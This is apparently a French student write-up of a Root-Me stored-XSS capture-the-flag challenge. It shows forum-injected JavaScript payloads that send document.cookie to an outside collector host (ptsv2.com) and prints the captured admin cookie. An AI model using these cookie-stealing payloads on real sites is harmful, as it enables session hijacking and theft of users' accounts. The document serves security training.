Aller au contenu
Élève Date Sujet
02/06/2022 TP-07 / Faille Web Client XSS

XSS - Stockée 1

Lien du CTF.

Analyse du site

Le formulaire du forum permet d'injecter du code, notamment du javascript.

<script>alert("Hello world");</script>

analyse.png

Lorsque l'on appui sur send, notre script est bien éxécuté :

alert.png

Compromission

Java Script + balise img

Avec l'aide d'un site ou l'on peu poster des données (ex : ptsv2.com), nous somme en mesures de créer un lien vers une fausse image, avec les données du cookies administrateur. En réalité, nous recevrons chaque cookies de chaque personne qui accèdera à cette "image".

Les retours à la ligne de semble pas être pris en compte.

Ci-dessous le code injecté :

<script>document.write('<img SRC = "https://ptsv2.com/t/1xojy-1656579182/post?' +'location='+document.location +'&cookie='+ document.cookie +'">');</script>

injection.png

Le résultat après queqlues minutes :

pts2-1.png

Nous avons le cookie admin !!

Parameter Values cookie ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6 location http://challenge01.root-me.org/web-client/ch18/?idx=3

Full JS

Ci-dessous le code injecté :

<script>window.open('https://ptsv2.com/t/1xojy-1656579182/post'+document.cookie)</script>

Finalisation de l'attaque

CSRF - 0 protection